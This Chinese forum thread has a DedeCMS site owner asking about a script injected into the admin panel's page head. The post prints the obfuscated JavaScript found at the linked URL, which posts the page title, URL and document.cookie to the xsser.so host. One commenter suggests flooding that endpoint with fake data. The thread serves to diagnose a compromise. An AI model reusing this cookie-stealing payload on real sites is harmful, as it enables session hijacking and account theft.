当前位置: 文江博客话题详情

dede又中标了!?!?

发布于 2021-11-28 17:44:41 字数 1796 浏览 1018 评论 9

今天打开dedecms后台,登录后跳转很慢,看到正在加载这个页面,http://xsser.so/

看了一下代码,居然在框架的head里加了这个:

<script src="http://t.cn/R2LgMPP" language="javascript" type="text/javascript"></script> 

打开http://t.cn/R2LgMPP,实际地址是:http://xsser.so/index.php?u=4a89dc

显示内容是js代码:

var  bid=421; var xingUrl='http://xsser.so/index.php';

eval(function(p,a,c,k,e,r){e=function(c){return c.toString(36)};if('0'.replace(0,e)==0){while(c--)r[e(c)]=k[c];k=[function(e){return r[e]||e}];
e=function(){return'[235-9b-df-np-u]'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c]);return p}('x=c.x||{d:3(){5(c.j){8 2=f j()}k 5(c.g){l{8 2=f g("Msxml2.m")}n(e){l{8 2=f g("Microsoft.m")}n(e){}}}h 2},i:3(2,6){2.onreadystatechange=3(){5(2.readyState==4){5(2.status==200){5(6)allback(2.responseText)}}}},p:3(o){5(typeof(o)=='object'){8 7='';
for(a in o){7+=a+'='+o[a]+'&'}7=7.substr(0,7.length-1);h 7}k{h o}},q:3(9,6){2=x.d();2.r('q',9,s);2.t(null);x.i(2,6)},u:3(9,b,6){2=x.d();2.r('u',9,s);
2.setRequestHeader('Content-Type','application/x-www-form-urlencoded');b=x.p(b);2.t(b);x.i(2,6)}}',[],31,'||ajax|function||if|callback|str|var|url||content|window|request||new|ActiveXObject|return|handle|XMLHttpRequest|else|try|XMLHTTP|catch||display|get|open|true|send|post'.split('|'),0,{}))
 
 

  x.post(xingUrl+"?a=info",{bid:bid,title:document.title,url:escape(document.URL),cookie:document.cookie});



请问这是什么鬼?js代码有什么危害?

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。

评论(9

高跟鞋的旋律 2021-12-01 08:10:14

敢不敢开源?

回复
筱武穆 2021-12-01 08:09:12

从来不用cms,都是
自己的mvc从0开始。是不是会被喷?

回复
偏爱自由 2021-12-01 08:08:19

我司还在用dedeCMS,我也是醉了。

回复
噩梦成真你也成魔 2021-12-01 07:49:13

dede已经多年无人维护了吧。老漏洞没人修复,别用了。

回复
时光清浅 2021-12-01 07:48:25

问题是这个网址是什么加入到html页面里去的?

一般情况是 通过sql注入漏洞写入 一句话木马。或者是有上传漏洞。

回复
永不分离 2021-12-01 07:22:36

是不是不用登录就可以访问我的后台?如何防范

回复
自此以后,行同陌路 2021-12-01 05:39:57

dede 本来就是做垃圾站的,就是用来被黑的,你还在乎这个干吗?

有一个很讽刺的事情,曾经的一个很大的PHP培训机构 php100,在2011年左右的时候因为用了dedeCMS,频繁被黑(比如:http://m.oschina.net/blog/28764),老脸都丢光了,最后无奈换了个CMS系统。

回复
清晨说ぺ晚安 2021-11-30 22:50:40

  x.post(xingUrl+"?a=info",{bid:bid,title:document.title,url:escape(document.URL),cookie:document.cookie});   写一个循环,向这个接口提交几千万数据。

回复
别低头,皇冠会掉 2021-11-30 11:52:13

问题是这个网址是什么加入到html页面里去的?

回复
~没有更多了~

关于作者

恋你朝朝暮暮

暂无简介

0 文章
0 评论
502 人气
发私信

相关话题

更多

热门标签

操作系统 程序设计 IT运维 Linux系统管理 JavaScript 服务器应用 solaris C/C++ PHP Shell BSD Vue.js aix Oracle Python HTML 系统管理 HTML5 CSS 前端
更多

推荐作者

linfzu01

文章 0 评论 0

§对你不离不弃

文章 0 评论 0

可遇━不可求

文章 0 评论 0

枕梦

文章 0 评论 0

qq_3LFa8Q

文章 0 评论 0

JP

文章 0 评论 0

更多

友情链接

文江博客
    我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
    原文